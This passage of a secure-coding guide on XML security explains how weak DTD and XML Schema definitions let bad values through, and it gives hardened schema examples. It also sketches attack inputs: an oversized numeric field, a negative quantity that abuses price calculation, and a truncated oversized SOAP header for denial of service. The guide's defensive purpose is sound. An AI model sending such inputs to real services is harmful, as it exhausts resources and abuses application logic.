Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
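&lt;br /&gt;
A hedged sketch of the same &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt; document described with XML Schema instead of DTD follows. The limits used (256 characters for &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt;, three digits and a maximum of 150 for &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;) are assumptions for illustration, not values taken from any specification:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;!-- the pattern bounds the written length; a value range alone still permits leading zeros --&amp;gt;&lt;br /&gt;
              &amp;lt;xs:pattern value=&amp;quot;[0-9]{1,3}&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
With these restrictions in place, the one-million-digit &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; value would fail validation.&lt;br /&gt;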
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and still considered it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
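For the hexadecimal case mentioned at the start of this section, a minimal sketch could use the built-in &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; data type rather than a restricted string. The element name &amp;lt;tt&amp;gt;key&amp;lt;/tt&amp;gt; and the length of 16 octets are hypothetical:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;key&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:hexBinary&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- length counts octets, so 16 octets are written as 32 hexadecimal digits --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;16&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;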
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative result on the user’s account. To avoid this logic flaw, use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
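That change could be sketched as follows. The upper bound of 1000 is an assumption added for illustration, since &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; alone sets no maximum:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;1000&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;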
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML Schema provides data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a data type that permits zero is used instead, a zero denominator may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
This schema restricts the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; document shown earlier. Because the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type does not include Infinity or &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; set to either value fails validation instead of reaching the application. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where valid values must have one specific length (for example, 8), the length can be specified as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
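&lt;br /&gt;
Numeric values can be bounded in a similar way. The following sketch assumes a hypothetical &amp;lt;tt&amp;gt;discount&amp;lt;/tt&amp;gt; element holding a percentage, with bounds and precision chosen only for illustration:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;discount&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:decimal&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minInclusive value=&amp;quot;0&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:fractionDigits value=&amp;quot;2&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;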
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
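&lt;br /&gt;
The &amp;lt;tt&amp;gt;xs:assertion&amp;lt;/tt&amp;gt; facet is part of XSD 1.1, so a processor limited to XSD 1.0 cannot apply the schema above. As a hedged alternative for such processors, a union of two built-in data types excludes zero while still accepting negative values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- zero belongs to neither member type, so it is rejected --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:union memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;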
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences forces the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
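&lt;br /&gt;
A bounded variant of the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; declaration inside the sequence could be sketched as follows. The limit of 100 is an assumed value and should be derived from what the application can actually process:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;buy&amp;quot; minOccurs=&amp;quot;1&amp;quot; maxOccurs=&amp;quot;100&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;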
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header largename1=&amp;quot;LARGEVALUE&amp;quot; largename2=&amp;quot;LARGEVALUE&amp;quot; largename3=&amp;quot;LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
